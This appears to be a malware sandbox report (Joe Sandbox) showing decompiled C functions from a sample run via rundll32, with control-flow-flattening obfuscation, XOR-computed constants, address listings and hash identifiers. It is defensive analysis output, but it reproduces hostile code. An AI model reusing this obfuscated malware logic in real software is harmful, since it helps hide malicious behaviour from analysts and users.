								_t334 =  *0x6a3e10; // 0x0
								E006847CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E0068A8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E00691E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E00688F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E0069C1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E0069ABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}



























































                                                                                                                      0x00699600
                                                                                                                      0x0069960a
                                                                                                                      0x00699612
                                                                                                                      0x00699620
                                                                                                                      0x00699624
                                                                                                                      0x00699626
                                                                                                                      0x0069962e
                                                                                                                      0x00699636
                                                                                                                      0x00699645
                                                                                                                      0x00699648
                                                                                                                      0x00699651
                                                                                                                      0x00699655
                                                                                                                      0x0069965d
                                                                                                                      0x00699665
                                                                                                                      0x0069966d
                                                                                                                      0x00699672
                                                                                                                      0x0069967a
                                                                                                                      0x00699682
                                                                                                                      0x00699686
                                                                                                                      0x0069968b
                                                                                                                      0x00699693
                                                                                                                      0x0069969b
                                                                                                                      0x006996a0
                                                                                                                      0x006996a8
                                                                                                                      0x006996ad
                                                                                                                      0x006996b5
                                                                                                                      0x006996bd
                                                                                                                      0x006996c5
                                                                                                                      0x006996cd
                                                                                                                      0x006996dd
                                                                                                                      0x006996e1
                                                                                                                      0x006996e9
                                                                                                                      0x006996f1
                                                                                                                      0x006996f9
                                                                                                                      0x00699701
                                                                                                                      0x00699709
                                                                                                                      0x00699711
                                                                                                                      0x00699719
                                                                                                                      0x00699721
                                                                                                                      0x0069972d
                                                                                                                      0x00699732
                                                                                                                      0x00699738
                                                                                                                      0x00699740
                                                                                                                      0x00699748
                                                                                                                      0x00699755
                                                                                                                      0x00699756
                                                                                                                      0x0069975a
                                                                                                                      0x00699762
                                                                                                                      0x0069976a
                                                                                                                      0x00699775
                                                                                                                      0x00699779
                                                                                                                      0x00699781
                                                                                                                      0x00699789
                                                                                                                      0x0069978e
                                                                                                                      0x00699796
                                                                                                                      0x0069979e
                                                                                                                      0x006997a6
                                                                                                                      0x006997ae
                                                                                                                      0x006997b6
                                                                                                                      0x006997bb
                                                                                                                      0x006997c3
                                                                                                                      0x006997ce
                                                                                                                      0x006997db
                                                                                                                      0x006997eb
                                                                                                                      0x006997f3
                                                                                                                      0x006997fb
                                                                                                                      0x00699800
                                                                                                                      0x00699808
                                                                                                                      0x00699817
                                                                                                                      0x00699818
                                                                                                                      0x00699821
                                                                                                                      0x00699825
                                                                                                                      0x0069982d
                                                                                                                      0x00699835
                                                                                                                      0x0069983d
                                                                                                                      0x00699845
                                                                                                                      0x0069984d
                                                                                                                      0x00699860
                                                                                                                      0x00699867
                                                                                                                      0x00699872
                                                                                                                      0x0069987a
                                                                                                                      0x00699883
                                                                                                                      0x00699887
                                                                                                                      0x0069988c
                                                                                                                      0x00699894
                                                                                                                      0x0069989c
                                                                                                                      0x006998a0
                                                                                                                      0x006998a8
                                                                                                                      0x006998b5
                                                                                                                      0x006998b9
                                                                                                                      0x006998c1
                                                                                                                      0x006998c9
                                                                                                                      0x006998d1
                                                                                                                      0x006998d9
                                                                                                                      0x006998e1
                                                                                                                      0x006998ef
                                                                                                                      0x006998f3
                                                                                                                      0x006998f8
                                                                                                                      0x00699900
                                                                                                                      0x00699908
                                                                                                                      0x0069990d
                                                                                                                      0x00699915
                                                                                                                      0x0069991d
                                                                                                                      0x00699927
                                                                                                                      0x0069992b
                                                                                                                      0x0069992f
                                                                                                                      0x00699937
                                                                                                                      0x0069993f
                                                                                                                      0x00699947
                                                                                                                      0x0069994f
                                                                                                                      0x00699957
                                                                                                                      0x0069995f
                                                                                                                      0x00699967
                                                                                                                      0x00699974
                                                                                                                      0x00699978
                                                                                                                      0x0069997d
                                                                                                                      0x00699985
                                                                                                                      0x0069998d
                                                                                                                      0x00699991
                                                                                                                      0x0069999e
                                                                                                                      0x006999a2
                                                                                                                      0x006999aa
                                                                                                                      0x006999b2
                                                                                                                      0x006999b7
                                                                                                                      0x006999bc
                                                                                                                      0x006999c4
                                                                                                                      0x006999cc
                                                                                                                      0x006999cc
                                                                                                                      0x006999da
                                                                                                                      0x00699afd
                                                                                                                      0x00699b06
                                                                                                                      0x00699b0d
                                                                                                                      0x00699b0e
                                                                                                                      0x00699b15
                                                                                                                      0x00699b1c
                                                                                                                      0x00699b23
                                                                                                                      0x00699b32
                                                                                                                      0x00699b3d
                                                                                                                      0x00699b49
                                                                                                                      0x00699b54
                                                                                                                      0x00699b62
                                                                                                                      0x00699b69
                                                                                                                      0x00699b70
                                                                                                                      0x00699b74
                                                                                                                      0x00699b76
                                                                                                                      0x00699b79
                                                                                                                      0x00000000
                                                                                                                      0x006999e0
                                                                                                                      0x006999e6
                                                                                                                      0x00699a87
                                                                                                                      0x00699a90
                                                                                                                      0x00699a98
                                                                                                                      0x00699a9e
                                                                                                                      0x00699aac
                                                                                                                      0x00699ac3
                                                                                                                      0x00699ad6
                                                                                                                      0x00699aeb
                                                                                                                      0x00699af0
                                                                                                                      0x00699af3
                                                                                                                      0x00000000
                                                                                                                      0x006999ec
                                                                                                                      0x006999f2
                                                                                                                      0x00699bba
                                                                                                                      0x006999f8
                                                                                                                      0x006999fe
                                                                                                                      0x00699a6d
                                                                                                                      0x00699a72
                                                                                                                      0x00699a74
                                                                                                                      0x00699a77
                                                                                                                      0x00699a7a
                                                                                                                      0x00699a80
                                                                                                                      0x00000000
                                                                                                                      0x00699a80
                                                                                                                      0x00699a00
                                                                                                                      0x00699a06
                                                                                                                      0x00699a31
                                                                                                                      0x00000000
                                                                                                                      0x00699a08
                                                                                                                      0x00699a0e
                                                                                                                      0x00000000
                                                                                                                      0x00699a14
                                                                                                                      0x00699a24
                                                                                                                      0x00699a2a
                                                                                                                      0x00000000
                                                                                                                      0x00699a2a
                                                                                                                      0x00699a0e
                                                                                                                      0x00699a06
                                                                                                                      0x006999fe
                                                                                                                      0x006999f2
                                                                                                                      0x006999e6
                                                                                                                      0x00699bc5
                                                                                                                      0x00699bce
                                                                                                                      0x00699bce
                                                                                                                      0x00699b88
                                                                                                                      0x00699b8f
                                                                                                                      0x00699b94
                                                                                                                      0x00699b9b
                                                                                                                      0x00699b9b
                                                                                                                      0x00699b9b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HwP$QjTF$aH3
                                                                                                                      • API String ID: 0-3950587752
                                                                                                                      • Opcode ID: f97cdecf444d9df432f4dda8753d838e031a9ba13fc95eafda0c63998ae279b8
                                                                                                                      • Instruction ID: 169da52420fa322962e7eba8e5fef382dc3254eb67a3a82463e4f89ed4dd8818
                                                                                                                      • Opcode Fuzzy Hash: f97cdecf444d9df432f4dda8753d838e031a9ba13fc95eafda0c63998ae279b8
                                                                                                                      • Instruction Fuzzy Hash: 96E12E714093819FD768CF25C58A65BBBE2FBC4748F208A1DF29A86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068B2C7 Relevance: 4.0, Strings: 3, Instructions: 235COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0068B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t137;
				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E00687FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E00694B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E00696DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E0069D97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E00690E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x6a3208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E00690B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E0068B74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E00691889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E00689714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E0068F09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E0068E5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E00683DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}





































                                                                                                                      0x0068b2d1
                                                                                                                      0x0068b2d8
                                                                                                                      0x0068b2d9
                                                                                                                      0x0068b2da
                                                                                                                      0x0068b2df
                                                                                                                      0x0068b2e7
                                                                                                                      0x0068b2f0
                                                                                                                      0x0068b2f2
                                                                                                                      0x0068b303
                                                                                                                      0x0068b308
                                                                                                                      0x0068b30e
                                                                                                                      0x0068b316
                                                                                                                      0x0068b31e
                                                                                                                      0x0068b326
                                                                                                                      0x0068b32e
                                                                                                                      0x0068b336
                                                                                                                      0x0068b33e
                                                                                                                      0x0068b346
                                                                                                                      0x0068b34e
                                                                                                                      0x0068b356
                                                                                                                      0x0068b35e
                                                                                                                      0x0068b366
                                                                                                                      0x0068b36e
                                                                                                                      0x0068b376
                                                                                                                      0x0068b37e
                                                                                                                      0x0068b386
                                                                                                                      0x0068b38b
                                                                                                                      0x0068b393
                                                                                                                      0x0068b39b
                                                                                                                      0x0068b3a7
                                                                                                                      0x0068b3ac
                                                                                                                      0x0068b3b2
                                                                                                                      0x0068b3ba
                                                                                                                      0x0068b3c7
                                                                                                                      0x0068b3ca
                                                                                                                      0x0068b3d6
                                                                                                                      0x0068b3df
                                                                                                                      0x0068b3e0
                                                                                                                      0x0068b3e4
                                                                                                                      0x0068b3ec
                                                                                                                      0x0068b3f4
                                                                                                                      0x0068b3fc
                                                                                                                      0x0068b401
                                                                                                                      0x0068b409
                                                                                                                      0x0068b411
                                                                                                                      0x0068b419
                                                                                                                      0x0068b421
                                                                                                                      0x0068b429
                                                                                                                      0x0068b431
                                                                                                                      0x0068b439
                                                                                                                      0x0068b441
                                                                                                                      0x0068b449
                                                                                                                      0x0068b457
                                                                                                                      0x0068b45b
                                                                                                                      0x0068b45f
                                                                                                                      0x0068b467
                                                                                                                      0x0068b46f
                                                                                                                      0x0068b477
                                                                                                                      0x0068b477
                                                                                                                      0x0068b47d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068b483
                                                                                                                      0x0068b483
                                                                                                                      0x0068b56e
                                                                                                                      0x0068b56f
                                                                                                                      0x0068b572
                                                                                                                      0x0068b578
                                                                                                                      0x0068b57c
                                                                                                                      0x0068b57e
                                                                                                                      0x0068b520
                                                                                                                      0x0068b520
                                                                                                                      0x0068b525
                                                                                                                      0x0068b477
                                                                                                                      0x0068b477
                                                                                                                      0x0068b477
                                                                                                                      0x0068b47d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068b47d
                                                                                                                      0x00000000
                                                                                                                      0x0068b6b6
                                                                                                                      0x0068b6b6
                                                                                                                      0x0068b6b6
                                                                                                                      0x0068b6c2
                                                                                                                      0x0068b6ce
                                                                                                                      0x0068b6ce
                                                                                                                      0x0068b584
                                                                                                                      0x0068b589
                                                                                                                      0x0068b590
                                                                                                                      0x0068b597
                                                                                                                      0x00000000
                                                                                                                      0x0068b597
                                                                                                                      0x0068b48f
                                                                                                                      0x0068b546
                                                                                                                      0x0068b54b
                                                                                                                      0x0068b55b
                                                                                                                      0x0068b4e6
                                                                                                                      0x0068b4e6
                                                                                                                      0x00000000
                                                                                                                      0x0068b4e6
                                                                                                                      0x0068b54d
                                                                                                                      0x00000000
                                                                                                                      0x0068b54d
                                                                                                                      0x0068b49b
                                                                                                                      0x0068b52a
                                                                                                                      0x0068b52f
                                                                                                                      0x0068b53f
                                                                                                                      0x00000000
                                                                                                                      0x0068b53f
                                                                                                                      0x0068b531
                                                                                                                      0x00000000
                                                                                                                      0x0068b531
                                                                                                                      0x0068b4a3
                                                                                                                      0x0068b510
                                                                                                                      0x0068b515
                                                                                                                      0x0068b518
                                                                                                                      0x0068b51a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068b51a
                                                                                                                      0x0068b4ab
                                                                                                                      0x0068b4df
                                                                                                                      0x0068b4e4
                                                                                                                      0x0068b4ee
                                                                                                                      0x0068b4ee
                                                                                                                      0x00000000
                                                                                                                      0x0068b4e4
                                                                                                                      0x0068b4af
                                                                                                                      0x0068b4c8
                                                                                                                      0x0068b4ce
                                                                                                                      0x0068b4d5
                                                                                                                      0x0068b4d7
                                                                                                                      0x0068b4c4
                                                                                                                      0x0068b4c4
                                                                                                                      0x00000000
                                                                                                                      0x0068b4c4
                                                                                                                      0x0068b4b7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068b4bf
                                                                                                                      0x00000000
                                                                                                                      0x0068b59f
                                                                                                                      0x0068b59f
                                                                                                                      0x0068b5a5
                                                                                                                      0x0068b698
                                                                                                                      0x0068b69d
                                                                                                                      0x0068b6af
                                                                                                                      0x0068b6b4
                                                                                                                      0x00000000
                                                                                                                      0x0068b6b4
                                                                                                                      0x0068b69f
                                                                                                                      0x00000000
                                                                                                                      0x0068b69f
                                                                                                                      0x0068b5ab
                                                                                                                      0x0068b5b1
                                                                                                                      0x0068b679
                                                                                                                      0x0068b67e
                                                                                                                      0x0068b68e
                                                                                                                      0x00000000
                                                                                                                      0x0068b68e
                                                                                                                      0x0068b680
                                                                                                                      0x00000000
                                                                                                                      0x0068b680
                                                                                                                      0x0068b5b7
                                                                                                                      0x0068b5bd
                                                                                                                      0x0068b658
                                                                                                                      0x0068b65d
                                                                                                                      0x0068b66f
                                                                                                                      0x00000000
                                                                                                                      0x0068b66f
                                                                                                                      0x0068b65f
                                                                                                                      0x00000000
                                                                                                                      0x0068b65f
                                                                                                                      0x0068b5c3
                                                                                                                      0x0068b5c9
                                                                                                                      0x0068b639
                                                                                                                      0x0068b63e
                                                                                                                      0x0068b64e
                                                                                                                      0x00000000
                                                                                                                      0x0068b64e
                                                                                                                      0x0068b640
                                                                                                                      0x00000000
                                                                                                                      0x0068b640
                                                                                                                      0x0068b5cb
                                                                                                                      0x0068b5d1
                                                                                                                      0x0068b61f
                                                                                                                      0x0068b62a
                                                                                                                      0x0068b632
                                                                                                                      0x00000000
                                                                                                                      0x0068b632
                                                                                                                      0x0068b5d3
                                                                                                                      0x0068b5d9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068b5f9
                                                                                                                      0x0068b5fe
                                                                                                                      0x0068b601
                                                                                                                      0x0068b601

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$h5$kn=
                                                                                                                      • API String ID: 0-2568719763
                                                                                                                      • Opcode ID: 2c8b7708cb4350419a04d8b387a528fad8e3beaa82f0e97e7a8b071f16a0082b
                                                                                                                      • Instruction ID: 71dbe5dc1f8da772abf16aa95c68ee37c6e75957f1e57e9c0d6fb369f7f510e1
                                                                                                                      • Opcode Fuzzy Hash: 2c8b7708cb4350419a04d8b387a528fad8e3beaa82f0e97e7a8b071f16a0082b
                                                                                                                      • Instruction Fuzzy Hash: C0A19870108340CBC768EF25D49656FBBF2FB84308F246A2EF19686261D7759A4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00694116 Relevance: 4.0, Strings: 3, Instructions: 223COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00694116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E00688F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
									_t222 = E00689350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E00691E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E0069ABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E0069DA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E0069C1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}











































                                                                                                                      0x0069411c
                                                                                                                      0x00694126
                                                                                                                      0x0069412e
                                                                                                                      0x00694136
                                                                                                                      0x0069413e
                                                                                                                      0x00694146
                                                                                                                      0x0069414e
                                                                                                                      0x00694156
                                                                                                                      0x0069415e
                                                                                                                      0x00694166
                                                                                                                      0x0069416e
                                                                                                                      0x00694176
                                                                                                                      0x0069417e
                                                                                                                      0x00694183
                                                                                                                      0x0069418b
                                                                                                                      0x00694193
                                                                                                                      0x006941a4
                                                                                                                      0x006941a8
                                                                                                                      0x006941aa
                                                                                                                      0x006941af
                                                                                                                      0x006941bb
                                                                                                                      0x006941be
                                                                                                                      0x006941c2
                                                                                                                      0x006941ca
                                                                                                                      0x006941da
                                                                                                                      0x006941de
                                                                                                                      0x006941e7
                                                                                                                      0x006941ec
                                                                                                                      0x006941f2
                                                                                                                      0x006941fa
                                                                                                                      0x00694202
                                                                                                                      0x00694207
                                                                                                                      0x0069420f
                                                                                                                      0x00694214
                                                                                                                      0x0069421c
                                                                                                                      0x00694224
                                                                                                                      0x00694230
                                                                                                                      0x00694233
                                                                                                                      0x00694237
                                                                                                                      0x0069423f
                                                                                                                      0x00694247
                                                                                                                      0x0069424f
                                                                                                                      0x00694254
                                                                                                                      0x0069425c
                                                                                                                      0x00694264
